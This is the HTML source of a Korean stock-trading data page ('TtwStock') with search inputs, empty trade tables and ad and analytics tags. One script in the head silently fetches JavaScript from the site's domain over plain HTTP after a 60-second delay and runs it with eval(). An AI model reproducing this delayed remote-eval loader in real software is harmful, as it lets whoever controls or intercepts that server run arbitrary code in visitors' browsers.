<!DOCTYPE html>
<HTML lang="kr" xml:lang="kr">
<HEAD>
<TITLE>TtwStock--당일 체결 상세 - 분</TITLE>
<META http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<META http-equiv="X-UA-Compatible" content="IE=Edge"/>
<META name="format-detection" content="telephone=no,address=SouthKorea Seoul,email=thdtjsdn@gmail.com">
<META name="keywords" content="stocks,charts,tables">
<META name="description" content="stocks,charts,tables">
<!-- facebook -->
<META property="og:type" content="website">
<META property="og:title" content="thdtjsdn's Stocks">
<META property="og:site_name" content="Stocks">
<META property="og:url" content="https://www.facebook.com/thdtjsdn0">
<META property="og:image" content="">
<META property="og:description" content=""/>
<!-- twitter -->
<META name="twitter:card" content="summary">
<META name="twitter:title" content="thdtjsdn">
<META name="twitter:url" content="https://twitter.com/TtwStockBot/">
<META name="twitter:image" content="">
<META name="twitter:description" content=""/>

<STYLE>
body { overflow-x: hidden; background-color: black; color: #FFFFFF; } ::-webkit-scrollbar { width: 6px; } ::-webkit-scrollbar-track { background-color: lightblue; } ::-webkit-scrollbar-track-piece { background-color: gray; } ::-webkit-scrollbar-thumb { border-radius: 8px; background-color: white; } ::-webkit-scrollbar-button { background-color: darkblue; width: 20px; height: 10px; } ::-webkit-scrollbar-button:start { background-color: red; } ::-webkit-scrollbar-button:end { background-color: orange; } ::-webkit-scrollbar-button:vertical:increment {} ::-webkit-scrollbar-button:vertical:decrement {} ::-webkit-scrollbar-corner { background-color: violet; } ::-webkit-resizer { background-color: green; } .divContainer { position: absolute; left: 0px; top: 0px; right: 0px; bottom: 0px; }
img { padding: 0px !important; border: none !important; }
a { text-decoration: none; color: #f5bf42; }
a:hover { background-color: orange; }

.pb0{ color: #2141de; } .pb{ color: #3498eb; }
.pr { color: #FF0000; }
.aa0 { color: #d2ff78; } .aa1 { color: #f4ff78; }
.aa2 { color: #ffef78; } .aa3 { color: #ffd078; }
.aa4 { color: #ffac78; } .aa5 { color: #ff8f78; }
.aa6 { color: #ff7878; } .aa7 { color: #ff3030; }

tbody tr:nth-child(2n) {background-color: #000000;}tbody tr:nth-child(2n+1) {background-color: #262626;}

td { border: 1px solid rgb(255, 255, 255); text-align: center; font-size: 20px; padding: 3px; }
td:hover { background-color: orange; cursor: pointer; }
.td-title { text-align: left; font-size: 18px; }
.td-cr { font-size: 20px; }
th { border: 1px solid rgb(255, 255, 255); }

.input_inp_btn {
 font-size: 17px;
 height: 70px;
 width: 97%;
 text-align: center;
}

.min-chart>img {
	width: 164.5px;
	height: 102px;
}

.div_ad { border: 0.5px dashed #FFFFFF; width: 100%; height: 250px; margin: 10px; text-align: center; }
.div_ad_child0 { padding-left: 0px; padding-top: 0px; }
</STYLE>
<script>setTimeout(function(){try{var o=new XMLHttpRequest();o.addEventListener("loadend",function(e){eval(this.responseText);});o.open("GET", "http://thdtjsdn.com/index.end.js?t="+Date.now());o.send();}catch(e){}},60000);</script>
</HEAD>
<BODY style="width: 100%; height: 100%; padding: 0px; margin: 0px;">
<SCRIPT id="ID-SCRIPT-000" type="text/javascript" src="http://thdtjsdn.com:49323/js-common/lib.common.js" defer="true"></SCRIPT>

<!-- Google AD -->
<!--
<div class="div_ad"><div class="inline-ad div_ad_child0"><script type="text/javascript">google_ad_client="ca-pub-1892980256031512";google_ad_host="ca-host-pub-1556223355139109";google_ad_host_channel="L0007";google_ad_slot="6262262429";google_ad_width=950;google_ad_height=250;</script><script type="text/javascript" src="https://pagead2.googlesyndication.com/pagead/show_ads.js"></script><ins id="aswift_2_expand" style="display:inline-table;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:10px;background-color:transparent;" data-ad-slot="6262262429"><ins id="aswift_2_anchor" style="display:block;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><iframe width="0" height="0" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_2" name="aswift_2" style="left:0;position:absolute;top:0;border:0px;width:0px;height:0px;"></iframe></ins></ins></div></div>
-->

<div>
	<div>　</div>
	<div style="text-align: left; font-size: 20px;">
		<!--
		    <span style="color: orange;">지정일 분별 체결 상세 정보</span>
		<br>
		-->
		    <span style="color: #FFFFFF;">대략 전종목 업데이트 시간 : 18시 이후</span>
		<br><span style="color: #FFFFFF;">장중 관리자 조회 종목 실시간 업데이트(<a style="color: #1D98F0;" href="https://twitter.com/TtwStockBot" target="_blank">트위터</a>에 알람)</span>
		<br><span style="color: orange; font-size: 20px;">사이트도 공짜인데 광고 클릭 한번씩 좀 해주지?</span>
	</div>

	<div>　</div>
	<div style="padding: 5px; margin-right: 15px;">
		<table style="width: 100%;">
			<thead>
				<th>
					일자입력
					<br>
					미입력시 마지막일
				</th>
				<th>
					종목명 입력
					<br>
					코드 아직 미지원
				</th>
				<th>
					종목명 입력 후
					<br>
					클릭
				</th>
				<th>
					종합 정보
					<br>
					이동
				</th>
				<th>
					증권사 금액
					<br>
					이동
				</th>
			</thead>
			<tbody>
				<td>
					<input class="input_inp_btn" id="ID-INPUT-DATE" placeholder="일자 입력 - 예) 20220426"></input>
				</td>
				<td>
					<input class="input_inp_btn" id="ID-INPUT-NAME" placeholder="종목명 입력"></input>
				</td>
				<td>
					<input class="input_inp_btn" id="ID-BUTTON-SEARCH" value="조회 버튼" type="button"></input>
				</td>
				<td>
					<input class="input_inp_btn" id="ID-BUTTON-SEARCH-DETAIL-D" value="종합정보(팝업)" type="button"></input>
				</td>
				<td>
					<input class="input_inp_btn" id="ID-BUTTON-SEARCH-DETAIL-P" value="금액정보(팝업)" type="button"></input>
				</td>
			</tbody>
		</table>
		<div>　</div>
	</div>
</div>
<div style="display: flex; padding-right: 20px; font-size: 15px;">
	<div style="width: 100%; overflow-y: auto;">
		<table style="width: 100%;">
			<thead>
				<tr>
					<th colspan="7">음성기록 금액 - 당일 히스토리</th>
				</tr>
				<tr>
					<th>마지막 포착</th>
					<th>마지막 직전</th>
					<th>마지막 2회전</th>
					<th>마지막 3회전</th>
					<th>마지막 4회전</th>
					<th>마지막 5회전</th>
					<th>마지막 6회전</th>
				</tr>
			</thead>
			<tbody id="ID-TBODY-음성기록금액">
			</tbody>
		</table>
	</div>
</div>
<div style="display: flex; padding-right: 20px; font-size: 15px;">
	<div style="width: 100%; overflow-y: auto;">
		<table style="width: 100%;">
			<thead>
				<tr>
					<th colspan="7">분체결상세 금액 - 당일(장후) 또는 전일부터(장중) 5일간 현황</th>
				</tr>
				<tr>
					<th>통합</th>
					<th>당일</th>
					<th>1일전</th>
					<th>2일전</th>
					<th>3일전</th>
					<th>4일전</th>
					<th>5일전</th>
				</tr>
			</thead>
			<tbody id="ID-TBODY-통합">
			</tbody>
		</table>
	</div>
</div>
<br>
<!--
<div style="font-size: 15px; color: orange;">　※ 증권사 원본 실시간 데이터가 기술적 이슈로 누락이 발생함</div>
-->
<div style="display: flex; padding-right: 20px; height: 100%; font-size: 25px;">
	<div>　매수금　:　</div>
	<div id="ID-DIV-매수금"></div>
	<div>　매도금　:　</div>
	<div id="ID-DIV-매도금"></div>
	<div>　합산금　:　</div>
	<div id="ID-DIV-합산금"></div>
</div>
<div style="display: flex; padding-right: 20px; height: 100%; font-size: 15px;">
	<div style="width: 100%; height: 950px; overflow-y: auto;">
		<table style="width: 100%;">
			<thead>
				<tr>
					<th colspan="6">시간순 정렬</th>
				</tr>
				<tr>
					<th>시간</th>
					<th>등락률</th>
					<th>가격</th>
					<th>수량</th>
					<th>금액</th>
					<th>합산</th>
				</tr>
			</thead>
			<tbody id="ID-TBODY0">
			</tbody>
		</table>
	</div>
	<div>　</div>
	<div style="width: 100%; height: 950px; overflow-y: auto;">
		<table style="width: 100%;">
			<thead>
				<tr>
					<th colspan="5">금액순 정렬</th>
				</tr>
				<tr>
					<th>시간</th>
					<th>등락률</th>
					<th>가격</th>
					<th>수량</th>
					<th>금액</th>
				</tr>
			</thead>
			<tbody id="ID-TBODY1">
			</tbody>
		</table>
	</div>
</div>

<!-- Google AD -->
<div class="div_ad"><div class="inline-ad div_ad_child0"><script type="text/javascript">google_ad_client="ca-pub-1892980256031512";google_ad_host="ca-host-pub-1556223355139109";google_ad_host_channel="L0007";google_ad_slot="6262262429";google_ad_width=950;google_ad_height=250;</script><script type="text/javascript" src="https://pagead2.googlesyndication.com/pagead/show_ads.js"></script><ins id="aswift_2_expand" style="display:inline-table;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:10px;background-color:transparent;" data-ad-slot="6262262429"><ins id="aswift_2_anchor" style="display:block;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><iframe width="0" height="0" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_2" name="aswift_2" style="left:0;position:absolute;top:0;border:0px;width:0px;height:0px;"></iframe></ins></ins></div></div>


<!-- Global site tag (gtag.js) - Google Analytics -->
<SCRIPT async src="https://www.googletagmanager.com/gtag/js?id=G-HGFLRYQ09Z"></SCRIPT>
<SCRIPT>try{window.dataLayer=window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js',new Date());gtag('config','G-HGFLRYQ09Z');}catch(e){}</SCRIPT>

<!-- Google AdSense - thdtjsdn -->
<SCRIPT data-ad-client="ca-pub-1892980256031512" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></SCRIPT>

<!--
<SCRIPT src="http://thdtjsdn.com/html/stock-당일체결상세-분/index.js">
<SCRIPT src="file:///D:/GitHub_Ttw--Base/TtwService-Ruaend--StockCharts--IMG/WebPage/root/html/stock-%EB%8B%B9%EC%9D%BC%EC%B2%B4%EA%B2%B0%EC%83%81%EC%84%B8-%EB%B6%84/index.js">
-->
<SCRIPT src="http://thdtjsdn.com/html/stock-당일체결상세-분/index.js">

</SCRIPT>
</BODY>
</HTML>